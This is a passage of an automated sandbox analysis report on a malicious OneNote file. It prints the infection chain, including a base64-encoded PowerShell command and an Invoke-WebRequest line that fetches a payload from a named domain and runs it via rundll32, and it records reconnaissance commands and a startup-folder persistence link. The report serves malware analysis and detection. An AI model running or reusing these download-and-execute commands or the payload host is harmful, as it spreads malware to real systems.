Source: X4QZWFTE.htm.15.dr	String found in binary or memory: <a class="fw-c-footer__social-channel --channel-youtube" href="https://www.youtube.com/user/cisco" title="YouTube" data-config-metrics-item="YouTube"> equals www.youtube.com (Youtube)

Source: unknown	HTTPS traffic detected: 144.217.139.27:443 -> 192.168.11.20:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 72.163.4.185:443 -> 192.168.11.20:49850 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 5548, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\putty.jpg

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_100194D0	14_2_100194D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_1001799F	14_2_1001799F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_100175E0	14_2_100175E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_10015207	14_2_10015207
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_10003EEA	14_2_10003EEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_10013BFA	14_2_10013BFA

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\whoami.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: edgegdi.dll

Source: putty.jpg.12.dr

Static PE information: Data appended to the last section found

Source: Process Memory Space: powershell.exe PID: 5548, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_1000A4A8 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,KiUserCallbackDispatcher,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,		14_2_1000A4A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_1000AA02 KiUserCallbackDispatcher,Wow64GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,		14_2_1000AA02

Source: 76d4c8d1.dll.14.dr

Static PE information: Resource name: RT_MESSAGETABLE type: a.out little-endian 32-bit pure executable not stripped

Source: 76d4c8d1.dll.14.dr	Static PE information: No import functions for PE file found
Source: putty.jpg.12.dr	Static PE information: No import functions for PE file found

Source: Send to OneNote.lnk.2.dr

LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\Documents\{DED308A4-BB60-4B3E-B0F5-4336B043D956}

Jump to behavior

Source: 76d4c8d1.dll.14.dr

Binary string: \Device\IPT[

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winONE@50/730@3/4

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File read: C:\Program Files\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_100011EB CreateBitmapIndirect,CreateBrushIndirect,CreateDIBPatternBrush,CreateDIBPatternBrushPt,CreateDIBSection,CreateEllipticRgn,CreateEllipticRgnIndirect,CreateEnhMetaFileA,CreateFontA,CreateFontIndirectExW,CreateHalftonePalette,CreateHatchBrush,CreatePatternBrush,CreatePenIndirect,CreateRectRgnIndirect,CreateRoundRectRgn,CreateScalableFontResourceA,CreateScalableFontResourceW,CreateSolidBrush,GdiGetBatchLimit,GdiTransparentBlt,WICMapGuidToShortName,WICMapSchemaToName,WICMapShortNameToGuid,AccessCheckAndAuditAlarmA,AccessCheckByTypeAndAuditAlarmA,AddAccessAllowedAce,AddAccessAllowedAceEx,AddAccessDeniedAce,AddAuditAccessObjectAce,BuildTrusteeWithSidA,ChangeServiceConfig2A,CloseTrace,ConvertToAutoInheritPrivateObjectSecurity,CreatePrivateObjectSecurity,EnumerateTraceGuidsEx,EqualDomainSid,EventActivityIdControl,EventWrite,EventWriteEx,EventWriteString,EventWriteTransfer,FindFirstFreeAce,GetEventLogInformation,GetAce,

14_2_100011EB

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\notes.one
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE /tsr
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://starcomputadoras.com/lt2eLM6/01.gif -OutFile C:\programdata\putty.jpg
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exe
Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE "C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net view
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c set
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
Source: C:\Windows\SysWOW64\ARP.EXE	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net share
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 share
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE route print
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -nao
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /all
Source: C:\Windows\SysWOW64\whoami.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE /tsr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://starcomputadoras.com/lt2eLM6/01.gif -OutFile C:\programdata\putty.jpg	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net view	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c set	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net share	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE route print	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -nao	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /all	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 share	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Local\Temp\{D9937C0E-ABFA-4834-B815-2855C722B4AF} - OProcSessId.dat

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_1000D972 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

14_2_1000D972

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_1000CD1E CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

14_2_1000CD1E

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:120:WilError_03
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{425CBF96-B8D4-4AD8-82CC-CE77AC7D0B87}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:304:WilStaging_02
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE	Mutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\{425CBF96-B8D4-4AD8-82CC-CE77AC7D0B87}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:304:WilStaging_02
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C02ADE90-C144-41D7-A20B-567444F3E3A3}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source:	Binary string: amstream.pdb source: backgroundTaskHost.exe, 0000000F.00000003.33864485500.0000000004651000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 76d4c8d1.dll.14.dr
Source:	Binary string: wntdll.pdb source: 76d4c8d1.dll.14.dr
Source:	Binary string: amstream.pdbGCTL source: backgroundTaskHost.exe, 0000000F.00000003.33864485500.0000000004651000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_1000970D LoadLibraryA,GetProcAddress,

14_2_1000970D

Source: 76d4c8d1.dll.14.dr

Static PE information: 0x8A32A22A [Mon Jun 22 08:22:02 2043 UTC]

Source: 76d4c8d1.dll.14.dr	Static PE information: section name: RT
Source: 76d4c8d1.dll.14.dr	Static PE information: section name: .mrdata
Source: 76d4c8d1.dll.14.dr	Static PE information: section name: .00cfg

Source: putty.jpg.12.dr

Static PE information: real checksum: 0x71bb8 should be: 0xb47e

Source: initial sample

Static PE information: section name: .text entropy: 6.845118704586284

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\putty.jpg

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\putty.jpg

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\putty.jpg			Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\76d4c8d1.dll			Jump to dropped file

Boot Survival

Uses whoami command line tool to query computer and username

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /all
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /all			Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

DLL reload attack detected

Source: C:\Windows\SysWOW64\rundll32.exe

Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\76D4C8D1.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: PID: 7584 base: E71790 value: E9 2E FE 8A FF

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
